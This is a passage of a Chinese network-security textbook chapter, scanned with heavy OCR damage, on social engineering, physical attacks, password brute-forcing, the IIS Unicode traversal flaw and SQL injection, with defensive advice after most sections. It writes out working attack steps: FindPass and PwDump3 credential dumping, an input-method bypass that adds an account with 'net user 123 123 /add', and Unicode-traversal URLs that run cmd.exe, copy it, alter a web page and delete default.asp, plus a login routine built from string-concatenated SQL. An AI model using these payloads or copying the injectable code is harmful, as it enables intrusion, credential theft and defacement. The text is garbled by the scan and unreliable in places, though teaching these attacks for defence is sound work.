程 学 式 的 攻击 。 基 本 的 说 服 手段 包括 扮演 、 讨 好 、 同 情 和 拉关系 等 。 不 论 是 使 用 哪 一 种 方 
法 ， 主 要 目的 还 是 说 服 目标 泄漏 所 需要 的 敏感 信息 。 

(1) 扮演 一 般 来 讲 是 构造 某 种 类 型 的 角色 并 按 该 角色 的 身份 行事 。 经 常 采用 的 角色 包括 
维修 人 员 、 技 术 支 持 人 员 、 经 理 、 可 信 的 第 三 方 人 员 或 者 是 企业 同事 。 某 些 时 候 就 仅仅 是 打 
电话 给 目标 ， 索 取 需 要 的 信息 。 但 是 这 种 方式 并 不 是 任何 时 候 都 有 效 ， 在 其 他 情况 下 ， 黑 客 
会 专心 调查 目标 机 构 中 的 某 一 个 人 ， 并 在 他 外 出 的 时 候 冒 充 他 的 声音 来 打 电 话 询问 信息 。 

(2) 还 有 一 种 比较 有 争议 的 社会 工程 学 手段 是 仅仅 简单 地 表现 出 友善 的 一 面 来 套 取信 
息 。 其 理由 是 大 多 数 人 都 愿意 相信 打 电 话 来 寻求 帮助 的 同事 所 说 的 话 ， 所 以 黑客 只 需要 获 
得 基本 的 信任 就 可 以 了 。 

(3) 获得 非法 信息 更 为 高 级 的 手段 被 称 为 “ 反 向 社会 工程 学 ”。 黑 客 会 扮演 一 个 不 存 
在 的 但 是 权力 很 大 的 人 物 ， 让 企业 雇员 主动 地 向 他 询问 信息 。 如 果 深 入 地 研究 ， 细 心地 计 
划 与 实施 的 话 ， 反 向 社会 工程 学 攻击 手段 可 以 让 黑客 获得 更 多 更 好 的 机 会 来 从 雇员 那里 获 
得 有 价值 的 信息 。 但 是 这 需要 大 量 的 时 间 来 准备 ， 研 究 以 及 进行 一 些 前 期 的 黑客 工作 。 反 
向 社会 工程 学 包括 三 个 部 分 : 暗中 破坏 、 自 我 推销 和 进行 帮助 。 黑 客 先是 对 网 络 进行 暗中 
的 破坏 ， 让 网 络 出 现 明 显 的 问题 ， 然 后 他 就 来 对 网 络 进行 维修 并 从 雇员 那里 获得 他 真正 需 
要 的 信息 。 那 些 雇员 不 会 知道 他 是 个 黑客 ， 因 为 他 们 网 络 中 出 现 的 问题 会 得 到 解决 ， 所 有 
人 都 会 很 高 兴 。 


6.2 物理 攻击 


6.2.1 物理 攻击 方法 
物理 攻击 是 指 通过 可 以 接触 到 的 设备 进行 攻击 。 物 理 攻击 有 两 种 方法 。 


司 经 肛 去 


才 Oo 洪 


司 经 颁 会 扩大 理 雁 与 笑 路 


(1) 管理 员 离开 计算 机 时 ， 没 有 加 密 计 算 机 或 者 直接 把 管理 员 登 录 的 计算 机 借 给 他 人 
使 用 ， 别 人 就 可 以 通过 工具 软件 来 获得 用 户 名 和 密码 。 
(2) 普通 用 户 通过 提升 权限 ， 获 得 与 管理 员 相同 的 权限 ， 达 到 长 期 占有 计算 机 的 目的 ; 


或 通过 命令 进入 到 某 个 计算 机 后 ， 使 用 命令 新 建 用 户 及 密码 ， 并 提升 权限 。 

例 6-1 通过 读 取 登 录 进 程 获得 当前 登录 用 户 的 口令 。 

在 Windows NT 操作 系统 中 ， 当 用 户 登 录 后 用 户 的 口令 是 存储 在 当前 用 户 的 登录 进程 
Cwinlogon) 当中 的 ， 这 样 当 用 户 去 访问 网 络 资源 的 时 候 就 会 从 登录 进程 当中 把 登录 的 用 户 
名 和 密码 提交 到 远程 去 验证 ， 微 软 的 这 种 机 制 是 为 了 实现 微软 的 一 次 登录 解决 所 有 问题 的 
构想 ， 但 是 这 样 也 带 来 了 安全 威胁 。 

通过 FindPass 工具 软件 可 以 对 该 进程 进行 解码 ， 然 后 将 当前 用 户 的 密码 显示 出 来 。 将 
FindPass.exe 文件 复制 到 虚拟 机 C 盘 根 目录 ， 执 行 该 程序 ， 将 得 到 当前 用 户 的 登录 名 和 密 
码 ， 如 图 6-1 所 示 。 


如 果 有 多 人 登录 同一 台 计 算 机 ， 还 可 以 查看 其 他 用 户 的 密码 ， 使 用 的 语法 如 下 : 


[" CA\WINNT\System32\cmd.exe -lolx| 


C:N\?findpass .exe 


To Find Password in the Winlogon process 
Usage: findpass.exe DomainName UserName PID-of-WinLogon 


The debug privilege has been added to PasswordReminder. 

The WinLogon process id is 192 (0Qx000000c0). 

To find ADSERUER\Administrator password in process 192 ... 
The encoded password is found at Ox008e0800 and has a lengt 


The logon information is: |ADSERUER/Administrator/123. 


The hash byte is: 90xd5 . 
主机 名 /登录 名 /密码 所 


电 4 


C:\> 


图 6-1 获取 用 户 名 和 密码 


FindPass.exe DomainName UserName PID-of-WinLogon 


其 中 ， 第 一 个 参数 DomainName 是 计算 机 的 名 称 ， 第 二 个 参数 UserName 是 需要 查看 
户 名 ， 这 个 用 户 必须 登录 到 系统 ， 如 果 没 有 登录 到 系统 ， 在 WinLogon 进程 中 不 


密码 的 
会 有 该 


前 两 个 参数 都 比较 容易 得 到 ，WinLogon 的 进程 号 只 有 到 任务 管理 器 中 才能 查看 ， 


用 


用 


可 以 利 


用 


户 的 密码 ， 第 三 个 参数 是 WinLogon 进程 的 进程 号 。 


pulist.exe 程序 查看 WinLogon 的 进程 号 。 使 用 的 方法 如 图 6-2 所 示 。 


也 


在 这 种 情况 下 ， 如 果 计 算 机 给 别人 使 用 的 话 ， 虽 然 没有 告诉 别人 计算 机 密码 是 多 少 ， 
别人 仍然 可 以 使 用 软件 破解 出 管理 员 的 账号 和 密码 。 如 果 是 Windows Server 2003 环境 的 
话 ， 还 可 以 使 用 FindPass2003.exe 等 工具 就 可 以 对 该 进程 进行 解码 ， 然 后 将 当前 用 户 的 密 


例 6-2 Windows 2000 输入 法 漏洞 。 
当 计 算 机 注销 时 ， 更 改 输入 法 为 郑 码 输入 法 ， 单 击 帮助 中 的 输入 法 入 门 ， 如 图 6-3 


User 


NT AUTHORITY\SYSTEM 
NT AUTHORITY\SYSTEM 
192 NT AUTHORITY\SYSTEM| 
seruices .exe 248 NT AUTHORITY\SYSTEM 
1sass .exe 260 NT AUTHORITY\SYSTEM 
suchost .exe 440 NT AUTHORITY\SYSTEM 
spoolsu.exe 476 NT AUTHORITY\SYSTEM 
1 


图 6-2 查看 Winlogon 的 进程 号 图 6-3 输入 法 漏洞 
进入 郑 码 输入 法 帮助 界面 ， 如 图 6-4 所 示 。 
朋 政 码 输入 法 帮助 
站 高 锡 


昌 录 加 | 索引 mg | 搜索 @) | 


概述 


A 编码 方法 的 基本 原理 


田 图 图 田力 


。 把 方块 汉字 看 作 由 构 字 单 元 组 合 而 
成 ， 基 础 的 构 宇 单元 是 字 根 ， 最 小 


构 宇 单元 是 笔画 。 
o hp、 鱼 、 口 ”4 个 字 
根 时 以太 “ 即 、 鲫 、 嘿 ” 
等 3 个 宇 根 ， 


0 字 根 “ 木 、 日 ”和 笔画 “ 
县 可 人 台 成 “ 札 、 电 ” 2 个 


。 字 根 排列 的 先后 顺序 叫 根 顺 ， 根 顺 与 
书写 顺序 一 致 。 

。 换 这 程 可 以 把 汉字 分 解 字 根 和 笔 | 

图 6-4” 郑 码 输入 法 帮助 界面 


在 郑 码 输入 法 帮助 界面 中 右 击 左 栏 ， 选 择 URL， 会 弹出 跳 至 URL 对 话 框 ， 如 图 6-5 
所 示 。 


上 ;EE x| 
当前 的 VRLCC) : 

[isemsITStore: C: WI \HELP VWINZN. CHON: : /su 
跳 至 该 VRL CD) : 

[winatvsysten53 


Cw | ws | 


图 6-5 “ 跳 至 URL” 对 话 框 


司 经 及 盐 


震 蛋 


克 缘 颁 会 拱 大 理论 与 笑 夏 


在 跳 至 该 URL 文本 框 中 输入 c:\winnt\isystem32， 单 击 确定 后 ， 在 右 侧 栏 中 会 显示 系统 
目录 中 的 所 有 文件 ， 如 图 6-6 所 示 。 
妥 政 码 输 入 法 攻 助 
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: 国 :时 1 国 } 国 


6-6 显示 系统 目录 中 所 有 文件 


在 系统 文件 中 找到 net 应 用 程序 ， 右 击 选择 创建 快捷 方式 , 打开 快捷 方式 net 属性 ,在 
目标 框 中 输入 空格 user 123 123 /add， 如 图 6-7 所 示 ， 单 击 确定 后 ， 即 可 用 用 户 名 123， 密 
人 码 123 进行 登录 。 


| 快捷 方式 net 尾 狂 


图 6-7 快捷 方式 net 属 性 


6.2.2 防范 措施 


目前 为 止 ， 任 何 操作 系统 几乎 没有 本 地 安全 性 可 言 ， 当 我 们 可 以 本 地 接触 一 台 主机 的 
时 候 ， 不 管 是 什么 类 型 的 操作 系统 我 们 都 可 以 轻易 地 利用 一 些 工 具 或 者 系统 的 一 些 特性 来 
登录 系统 。 对 物理 攻击 的 防范 措施 主要 有 设 定 计算 机 屏保 开机 密码 ， 计 算 机 需要 借 出 时 应 
该 在 监督 下 使 用 ， 或 者 在 其 他 用 户 使 用 完 后 对 系统 做 详细 的 检查 。 


6.3 暴力 攻击 


暴力 攻击 是 指 采 用 字典 穷 举 法 〈 也 称 暴 力 法 ) 来 破解 用 户 的 密码 。 字 典 就 是 一 个 文本 
文件 ， 里 面包 含 了 所 有 可 能 密码 列表 。 攻 击 者 可 以 通过 一 些 工具 软件 ， 自 动 地 从 电脑 字典 
中 取出 一 个 单词 ， 作 为 用 户 的 口令 ,再 输入 给 远 端的 主机 ， 申 请 进入 系统 ;如 果 口令 错误 ， 
就 按 序 取出 下 一 个 单词 ， 进 行 下 一 个 尝试 ， 并 一 直 循环 下 去 ， 直 到 找到 正确 的 口令 或 字典 
的 单词 试 完 为 止 。 由 于 这 个 破译 过 程 是 由 计算 机 程序 来 自动 完成 的 ， 所 以 几 个 小 时 就 可 以 
把 数 十 万 记录 的 字典 里 的 所 有 单词 都 尝试 一 遍 。 也 就 是 说 ， 只 有 被 破解 用 户 的 密码 存在 于 
字典 中 ， 才 会 被 这 种 方式 所 找到 ， 千 万 不 要 小 看 这 个 看 上 去 满 守株待兔 的 方法 ， 由 于 网 络 
上 经 常 有 不 同 的 黑客 彼此 交换 字典 ， 因 此 一 份 网 上 流传 的 字典 ， 通 常 是 包含 了 很 多 很 多 黑 
客 经 验 的 累积 ， 对 于 安全 意识 不 高 的 用 户 ， 破 解 率 是 很 高 的 。 


6.3.1 暴力 攻击 类 型 


目前 常用 的 暴力 破解 主要 包含 以 下 4 种 类 型 。 

1. 字典 攻击 

因为 多 数 人 使 用 普通 词典 中 的 单词 作为 口令 ， 发 起 词典 攻击 通常 是 较 好 的 开端 。 词 典 
攻击 使 用 一 个 包含 大 多 数 词典 单词 的 文件 ， 用 这 些 单词 猜测 用 户口 令 。 

2， 强 行 攻击 

许多 人 认为 如 果 使 用 够 长 的 口令 ， 或 者 使 用 足够 完善 的 加 密 模式 ， 就 能 有 一 个 攻 不 破 
的 口令 。 事 实 上 没有 攻 不 破 的 口令 ， 这 只 是 个 时 间 问 题 。 如 果 有 速度 足够 快 的 计算 机 能 党 
斌 字母、 数字、 特殊 字符 所 有 的 组 合 ， 将 最 终 能 破解 所 有 的 口令 。 这 种 类 型 的 攻击 方法 叫 
强行 攻击 。 使 用 强行 攻击 ， 先 从 字母 a 开始 ， 尝 试 aa、ab、ac 等 ， 然 后 再 尝试 aaa、aab…。 

3. 组 合 攻击 

词典 攻击 只 能 发 现 词典 单词 口令 ， 但 是 速度 快 。 强 行 
攻击 能 发 现 所 有 的 口令 ， 但 是 破解 时 间 很 长 。 在 公司 里 ， 
很 多 管理 员 要 求 员工 口令 使 用 字母 和 数字 组 合 ， 一 些 员工 | 
的 对 策 是 在 口令 后 面 添加 几 个 数字 。 如 把 口令 computer 
变 成 computer123， 实 际 上 这 样 的 口令 很 弱 。 有 一 种 攻击 
使 用 词典 单词 但 是 在 单词 尾部 串 接 几 个 字母 和 数字 ， 这 就 
是 组 合 攻击 。 基 本 上 ， 它 介 于 词典 攻击 和 强行 攻击 之 间 。 
图 6-8 是 一 个 简单 的 组 合 攻击 字典 文件 。 国 68 字典 交 作 


文件 (月 ” 编 强 (E) 格式 (O) 前 看 V) 
帮助 (H) 

computer123 

computer1234 

hello0123 

hellol234 

text0324 


克 乡 委 会 英 大 理论 与 笑 践 


4. 社会 工程 学 字典 攻击 

如 果 黑 客 从 侧面 了 解 到 该 服务 器 所 属 单位 的 电话 号 码 范围 、 街 道 号 、 门 牌号 、 网 络 管 
理 员 的 手机 号 、 生 日 、 信 息 办 的 门牌 号 等 ， 就 会 用 这 些 数 据 为 基准 参数 制造 黑客 字典 ， 因 
为 ， 很 多 人 为 了 记忆 简便 ， 都 会 利用 自己 的 一 些 常用 信息 作为 密码 ， 这 样 就 导致 了 字典 攻 
击 的 可 能 性 。 利 用 对 目标 用 户 本 人 的 了 解 ， 可 以 使 用 社会 工程 学 来 生成 字典 ， 再 利用 该 字 
典 进行 攻击 ， 这 个 字典 的 成 功率 就 比 盲目 的 拿 一 个 字典 成 功率 高 。 图 6-9 是 一 个 社会 工程 
学 字典 生成 器 主 界面 。 


N. 5. P. H 社 会 工程 学 字典 


用 户 出 生日 期: 用 户 邮箱 名 : 
示例 : 19841010 
用 户 手机 号 : 用 户 座机 号 : 用 户 和 名 殴 文 / 振 商 }: 
用 户 名 古 笔 }: 用 户 邮 坑 : 用 户 008: 
用 户 网 址 : 用 户 网 站 成 立 日 期: 所 属 组 织 名 (拼音 ): 
常用 密码: 习惯 用 的 字符 / 诬 文 司 字 : 女友 /让 于 名字 暗 首 : 


女友 /雪子 电话 : 女友 /雪子 出 生日 期 : 女友 蛮 子 名 字 臣 笔 ]: 


女友 雪子 网 名 : 用 户 最 好 的 朋友 名 本 商 ): 用 户 常用 注册 名 ( 拼 苏 ): 


在 未 博 上 未 信 息 情 况 下 仍 能 生成 一 芝 规 字 鼻 生成 宙 码 字 奥 by tose ofhtpy/mwwncphnet 


图 6-9 社会 工程 学 字典 生成 器 主 界面 
6.3.2 暴力 破解 NT 主机 的 SAM 数据 库 


SAM 文件 即 安全 账号 管理 数据 库 (Security Accounts Management database )，SAM 数 
据 库 是 NT 主机 存放 用 户 名 和 口令 的 数据 库 ， 当 我 们 登录 系统 时 ,系统 会 自动 地 和 SAM 进 
行 校 对 ， 如 果 发 现 此 次 密码 和 用 户 名 与 SAM 文件 中 的 加 密 数据 符合 ， 就 会 顺利 登录 ， 如 
果 错 误 的 话 则 无 法 登录 。 如 果 通 过 一 些 方法 得 到 了 目标 主机 或 本 地 主机 的 SAM 数据 库 ， 
那么 就 可 以 使 用 一 些 工具 软件 进行 SAM 数据 库 的 破解 .下 面 以 实例 介绍 暴力 破解 NT 主机 
SAM 数据 库 的 方法 。 


复制 文件 或 文件 夹 时 出 铺 x 
在 系统 中 ，SAM 文件 是 不 可 以 复制 的 ， 复 制 的 话 
会 出 现 错误 提示 ， 如 图 6-10 所 示 。 这 和 和 站 站 
此 可 见 ， 如 果 想 破解 SAM 数据 库 ， 首 先 要 使 用 一 二 一 


工具 软件 将 SAM 数据 库 下 载 下 来 ， 这 里 使 用 工具 软件 
PwDump3 下 载 SAM 数据 库 。PwDump3 工具 软件 使 用 “图 6.10 复制 SAM 数据 库 错 误 提示 
命令 如 下 : 


PWDUMP3 machineName [outputFile] [userName] 


使 用 方法 如 图 6-11 所 示 ， 这 里 注意 ， 需 要 知道 系统 中 一 个 用 户 的 用 户 名 和 密码 ， 才 可 


以 将 数据 库 下 载 成 功 。 


°C:\WINNT\System32\cmd.exe 


pudump3 by Phil Staubs, e-business technology 
Copyright 2091 e-business technology, Inc. 


This program is free software based on pwpump2 by Tony Sabi 
General Public License Uersion 2 (GNU GPL), you can redistr 
modify it under the terms of the GNU GPL, as published by t 
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED 
PROGRAM. Please see the COPYING file included with this pr 
available at Www.ebiz-tech.com/pudump3) and the GNU GPL for 


Please enter the password >xxxx 
Completed. 


图 6-11 下 载 SAM 数据 库 


打开 下 载 成 功 的 SAM 数据 库 文件 212.txt， 文 件 中 内 容 如 图 6-12 所 示 ， 数 据 都 经 过 加 
密 处 理 ， 因 此 需要 使 用 工具 软件 来 破解 SAM 数据 库 。 


文件 (月 ”编辑 (E) 格式 (O) 剖 看 (V) ”帮助 (H) 


dministrator:500:CCF9155E3E7DB453AAD3B435B ~ 
Guest :501 :NO PASSIWORD*** 站 站 站 站 站 站 站 站; 


IUSR_ADSERVER:1001 :823E3EBCB6847C2B802395DA 
INAIL_ADSERVER:1002:F331A744CBD48ADAB17AB748 
TsInternetUser:1000:4C832AC38A7347B0657BF3B 
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图 6-12 ”SAM 数据库 文件 
使 用 LC5 破解 SAM 数据库， 软件 主 界面 如 图 6-13 所 示 。 


文件 (D。 音 看 (V) 会 活 (S) 任务 (QO 纠正 (R) 帮助 (H) 


图 的 他 机 和 了 仓 | 人 昌 下 昌国 @@ 


图 6-13 ILC5 软件 主 界面 


震 蛋 


克 乡 莽 盐 


同 经 颁 会 扩大 理 雁 与 笑 距 


选择 “会 话 ” 主 菜单 中 的 导入 , 进入 “导入 ”对 话 框 , 如 图 6-14 所 示 , 选中 从 PWDUMP 
文件 进行 导入 ， 并 且 单 击 浏览 按钮 ， 选 择 212.txt 文件 路 径 。 


导入 从 一 一 一 一 一 一 
个 本 地 电脑 WH: 
个 运程 电脑 


-从 文件 导入 一 一 一 一 一 一 
广 从 sa 文件 
个 从 LCc4 文件 
他 从 PYDUIP 文件 


个 从 Unix shadow 文件 


图 6-14 “导入 ”对 话 框 


设置 完毕 后 ， 单 击 运行 按钮 ， 开 始 破解 ， 破 解 成 功 后 的 界面 如 图 6-15 所 示 。 


Fr 一 一 一 童 看 (V) me 任务 (C) 纠正 (R) 帮助 (H) 


TO > ll a 


IUSR_ADSERVER 
IWAM_ADSERVER 
TsInternetUser 
Administrator 


破解 出 的 用 户 名 和 密码 


图 6-15 ”破解 界面 


6.3.3 暴力 破解 邮箱 密码 


邮箱 密码 一 般 需要 设置 到 8 位 以 上 ，7 位 以 下 的 密码 容易 被 破解 ， 尤 其 全 是 数字 ， 更 
容易 被 破解 。 多 线程 邮箱 密码 在 线 破解 器 ， 可 以 利用 大 字典 或 者 利用 社会 工程 学 字典 在 线 
破解 邮箱 密码 ， 界面 如 图 6-16 所 示 。 在 服务 器 地 址 框 中 输入 目标 邮箱 的 服务 器 地 址 ， 在 邮 


箱 账号 框 中 输入 目标 邮箱 号 ， 通 过 字典 设置 来 选择 合适 的 字典 ， 字 典 中 可 能 的 密码 数量 越 
多 ， 破 解 邮箱 密码 的 概率 越 大 。 
于 EnailCrack 夷 正点 恒 


服务 器 地 址 : [sntp. 128. com 3 es | 
邮箱 账号 名 : [aal46601 设置 | 


E: \Documents and Settings\Administrator\ 梨 面 \Q( 
图 6-16 在 线 破解 邮箱 密码 


6.3.4 暴力 攻击 的 防御 

暴力 攻击 的 防御 方法 如 下 ; 

(1) 不 管 是 服务 器 还 是 客户 计算 机 ， 尽 量 减 少 账户 存在 的 数量 ; 

(2) 所 有 账户 的 密码 必须 足够 复杂 ， 一 般 有 如 下 约定 ， 普 通 客户 计算 机 上 的 账户 密码 
最 少 长 度 为 6 位 ， 服 务 器 上 的 账户 密码 最 小 长 度 为 8 位 ; 

(3) 密码 不 要 使 用 与 单位 或 个 人 有 关 的 信息 

04) 根据 现在 通用 的 密码 暴力 猜测 算法 ， 可 以 反 向 思考 ， 加 大 黑客 的 破解 难 度 ， 比 如 
我 们 可 以 用 大 写字 母 开头 构造 密码 ， 或 者 以 特殊 字符 开头 构造 密码 ; 

(5) 密码 中 不 要 包含 英文 单词 ， 英 文 单词 是 字典 攻击 的 猜测 范围 ， 破 解 成 功率 很 高 ; 

(6) 密码 中 不 要 使 用 连续 的 字符 或 者 字母 ; 

(7) 密码 必须 强行 设置 策略 实现 至 少 40 天 更 新 密码 一 次 ， 更 新 后 的 密码 与 更 新 前 的 
密码 不 要 类 似 ， 更 加 不 要 使 用 曾经 使 用 过 的 密码 ; 

(8) 设置 服务 器 或 者 客户 计算 机 的 操作 系统 密码 尝试 次 数 ; 

(9) 通过 制定 安全 管理 制度 和 提高 用 户 安全 意识 ， 避 免 外 来 人 员 与 内 部 计算 机 单独 接 
触 的 机 会 。 


6.4 ”Unicode 漏洞 攻击 


6.4.1 Unicode 


Unicode〈 统 一 码 、 万 国 码 、 单 一 码 ) 是 一 种 在 计算 机 上 使 用 的 字符 编码 。Unicode 标 
准 被 很 多 软件 开发 者 所 采用 ， 无 论 何 种 平台 、 程 序 或 开发 语言 ， 它 为 每 种 语言 中 的 每 个 字 


第 
6 
章 


司 痛 基 去 


克 乡 委 会 兹 大 理论 与 笑 践 


符 设 定 了 统一 并 且 唯 一 的 二 进 制 编码 。1990 年 开始 研发 ，1994 年 正式 公布 。 随 着 计算 机 工 
作 能 力 的 增强 ，Unicode 也 在 面世 以 来 的 十 多 年 里 得 到 普及 。 


6.4.2 漏洞 公告 


2000 年 10 月 17 日 中 联 绿 盟 发 布 了 以 下 的 安全 公告 。 微 软 IS 4.0/5.0 扩展 Unicode 
目录 遍历 漏洞 ， 公 告 描述 如 下 。 

远程 漏洞 : 是 

本 地 漏洞 : 是 

发 布 日 期 2000 年 10 月 17 日 

更 新 日 期 2000 年 10 月 17 日 

受 影 响 的 版 本 : 

Microsoft IIS 5.0 十 Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows 
NT 4.0 +Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 


-Microsoft Windows NT 4.0 

漏洞 描述 : 

微软 IIS 4.0 和 5.0 都 存在 利用 扩展 Unicode 字符 取代 "" 和 "AN" 而 能 利用 "../" 目录 遍历 
的 漏洞 。 


未 经 授权 的 用 户 可 能 利用 IUSR_machinename 账号 的 上 下 文 空间 访问 任何 已 知 的 文 
件 。 该 账号 在 默认 情况 下 属于 Everyone 和 Users 组 的 成 员 ,， 因 此 任何 与 Web 根 目 录 在 同一 
逻辑 驱动 器 上 的 能 被 这 些 用 户 组 访问 的 文件 都 能 被 删除 、 修 改 或 执行 ， 就 如 同一 个 用 户 成 
功 登 录 所 能 完成 的 一 样 。 


6.4.3 ” 汤 洞 检测 


首先 ， 对 网 络 内 IP 地 址 为 192.168.8.212 的 主机 ， 可 以 在 正 地 址 栏 输入 http://192.168. 
8.212/scripts/..%255c../winnt/system32/cmd.exe?+/ctdirtc:\〔( 其 中 %255c 为 Windows 2000 漏 
洞 编码 ， 在 不 同 的 操作 系统 中 ， 可 使 用 不 同 的 漏洞 编码 )， 如 果 可 以 在 正 浏览 器 中 查看 到 
C 盘 根 目 录 下 文件 ， 说 明 他 地 址 为 192.168.8.212 的 主机 存在 Unicode 漏洞 。 

其 次 , 要 检测 网 络 中 某 卫 段 的 Unicode 漏洞 情况 , 可 使 用 专门 的 漏洞 扫描 工具 来 检测 。 


6.4.4 使 用 Unicode 汤 洞 进行 攻击 
例 6-3 查看 目录 。 
使 用 Unicode 漏洞 可 以 容易 地 查看 目标 计算 机 中 的 目录 ， 使 用 的 语句 如 下 : 
http://192.168.8.212/scripts/..%255c../winnt/system32/cmd.exe?+/ctdirtc:\ 


执行 结果 如 图 6-17 所 示 。 

出 现 这 个 界面 说 明 已 经 成 功 查看 到 目标 计算 机 C 盘 目 录 ， 为 了 使 用 方便 ， 可 通过 语句 
将 cmd.exe 文件 拷贝 到 scripts 目录 ， 并 改名 为 cnfexe， 使 用 的 语句 如 下 : 

http://192.168.8.212/scripts/..%255c../winnt/system32/cmd.exe?/ctcopytc 


:\winnt\system32\cmd.exetcnf .exe 


执行 结果 如 图 6-18 所 示 。 


| 文件 中 ”编辑 (E 查看 WW) 收 启 外 ”工具 ID 帮助 由 


| 叶 撒 "了 -国有 四 人身 | 克拉 索 国 收 总 名 | 书生 


Directory of c:\ 


2002-10-19 04:45 《<DIR> YINNT 


2002-10-19 05:01 <DIR> Inetpub 


2011-10-12 16:06 <DIR> tools 
0 File(s) 0 bytes 
6 Dir(s) 3,187,814,400 bytes free 


2002-10-19 04:50 <DIR> Documents and Settings 显示 IP 地 址 
2002-10-19 04:51 <DIR> Program Files 192.168.8.212 


2011-10-11 20:38 <DIR> pwdump3 中 C 盘 的 目录 


图 6-17 执行 结果 (查看 目录 ) 


EEC 
上 文件 编外 查看 收 庆 的 工具 (D 天 且 中 

] 中 恨 - 洛 " 固 加 向 | 风 扫 -| 向 收 迄 友 | 友和 名 
| 地址 (9) 峰 ssc. .Jwnntjsystem32jemd.exerjc+copy+ci\wnntlsystem32\cmd.exe+cnf.exe | 忆 苇 到 | | 链接 ”| 


CGI Error 


The specified CGI application misbehaved by not returning a complete 
set of HITP headers. The headers it did return are: 


1 file(s) copied. 


到 
mm 
图 6-18 执行 结果 拷贝 文件 ) 


这 样 ， 以 后 使 用 cmd.exe 命令 就 方便 了 ， 例 如 ， 查 看 C 盘 的 目录 ， 使 用 的 语句 就 可 以 


简化 为 : 


http://192.168.8.212/scripts/cnf .exe?/c+dir+tc:\ 


例 6-4 修改 页 面 。 
可 以 使 用 命令 语句 来 修改 目标 计算 机 的 Web 页 面 ， 使 用 语句 如 下 : 


http://192.168.8.212/scripts/cnf.exe?/ctechothello+>>+c:\inetpub\wwwroo 


t\ip.asp 


修改 页 面前 登录 到 192.168.8.212 中 的 Web 页 面 ， 如 图 6-19 所 示 。 


TIAD 了 
| ER ~ -OH der men Fe | D3 


ke fe3 wre ns2 see A212 可 PR 到 ”| 


来 访 者 IP: 192. 168. 8. 212 


EE-3 [| remet 到 


图 6-19 Web 主页 面 


司 办 及 直 


才 Oo 洪 


克 络 多 会 页 大 理论 与 实践 


执行 修改 页 面 语句 后 ， 结 果 如 图 6-20 所 示 。 


下 Errorin CGI Application - Microsoft InterneE EKPIGrer -Io|x| 
」 文件 (编辑 (四 查看 (WW 收 诚 (和 工具 (D 帮助 (中 | 

| 中 恨 ， 小 " 固 因 集 | 风 要 央 收 和 大 | 妈 * 汪 

J fe 92.160.6.212/srts en.exerfetochothelot >>tc inetpun wrootip oop | | 让 所 加 


CGI Error 


The specified C6I application misbehaved by not returning a complete 
set of HITP headers. The headers it did return are: 


加 
EE [intemet 有 


图 6-20 执行 结果 修改 页 面 ) 


出 现 这 个 界面 说 明 已 经 修改 页 面 成 功 。 下 面 再 访问 192.168.8.212 的 Web 主页 ， 如 
图 6-21 所 示 。 


习 无 标题 文档 - Microsoft Internet Explorer 


| 文件 (编辑 (E) 查看 (0 收藏 包工 具 (ID 帮助 ( 册 | 
| HE - 国 四 对 | 风 插 有 a 国 收 京 迎 历 > | 书 沪 


来 访 者 IP: 192. 168. 8. 212 


Ge ) 向 主页 面 添加 单词 “hellom 
说 明 已 成 功 修改 页 面 。 


| 
完成 [ [| intemnet 元 


图 6-21 修改 后 Web 主页 面 


使 用 Unicode 漏洞 还 可 以 容易 地 删除 目标 计算 机 的 Web 主页 面 ， 例 如 ， 现 在 已 经 知道 
对 方 网 站 的 根 路 径 为 “C:\Inetpubvwwwroot”( 系 统 默认 )， 可 以 通过 删除 该 路 径 下 的 文件 
default.asp 来 删除 主页 ， 这 里 的 default.asp 文件 是 IS 的 默认 启动 页 面 。 使 用 的 语句 如 下 : 


http://192.168.8.212/scripts/cnf.exe?/c+tdel+ c:\inetpub\wwwroot\default. 


asp 
6.4.5 ” Unicode 漏洞 解决 方法 
车 网 络 内 存在 Unicode 漏洞 ， 可 采取 如 下 方法 进行 补救 。 


(1) 限制 网 络 用 户 访问 和 调用 cmd 命令 的 权限 。 
(2) 若 没 必 要 使 用 scripts 和 msadc 目录 ， 就 删除 或 改名 。 


(3) 安装 Windows NT 系统 不 要 使 用 默认 路 径 ， 可 以 改 为 其 他 目录 下 。 

(4) 用 户 可 以 从 如 下 地 址 下 载 Microsoft 提供 的 补丁 : IIS 4.0 为 http://www.microsoft. 
com/ntserver/nts/downloads/critical/q269862/default.asp ; IS 5.0 为 http://www.microsoft.com/ 
windows2000/downloads/critical/q269862/default.asp。 


6.5 SQL 注入 攻击 


针对 SQL Server 的 攻击 主要 来 自 两 个 方面 ， 一 方面 攻击 者 使 用 SQL 的 服务 器 漏洞 进 
行 蠕虫 病毒 的 攻击 ， 另 一 方面 攻击 者 利用 网 站 编写 者 的 书写 漏洞 进行 攻击 。 


6.5.1 SQL 注入 原理 


在 一 些 Web 表单 中 ， 用 户 输 入 的 内 容 可 能 直接 用 来 构建 SQL 查询 命令 ， 如 果 不 加 以 
防范 ， 很 容易 受到 SQL 注入 攻击 。SQL 注入 攻击 是 攻击 者 把 SQL 命令 插入 到 Web 表单 的 
输入 域 或 页 面 请 求 的 查询 字符 串 中 ， 以 便 欺 骗 服 务 器 并 执行 超越 权限 的 SQL 命令 。 

例 6-5 SQL 注入 攻击 。 

下 面 是 一 个 常见 的 SQL 注入 攻击 的 例子 ， 具 体 步 骤 如 下 。 

(1) 新 建 一 个 登录 页 面 login.aspx， 页 面 有 两 个 文本 输入 框 txtUser、txtPassword 用 来 
输入 用 户 名 和 密码 ， 添 加 一 个 登录 按钮 来 提交 认证 。 

(2) 单 击 “ 登 录 ” 按 钮 ， 进 入 后 台 程 序 界面 login.aspx.cs。 在 按钮 触发 过 程 中 ， 根 据 文 
本 框 动态 生成 SQL 命令 ， 并 根据 是 否 返 回 记 录 判 断 登录 是 否 成 功 。 具 体 代 码 如 下 。 


protected void LoginButton Click Click(object sender, EventArgs e) 
{ 
// 动 态 生成 的 SQL 语句 
System.Text.StringBuilder query = new System.Text.StringBuilder 
("Select Count (*) from users where Username='") 
.Append (txtUser .Text) 


.Append("'and password='") .Append (txtPassword.Text) .Append("'"); 

// 连 接 字 符 囊 

string ConStr = "Server=(local) ;User id =sa;Pwd=;Database=HappyNet"; 
// 数 据 库 操作 部 分 


System.Data.SqlClient.SqlCommand cmd = new System.Data.SqlClient. 
SqlCommand (query .ToString ()); 

cmd.Connection = new System.Data.SqlClient.SqlConnection (Constr ); 
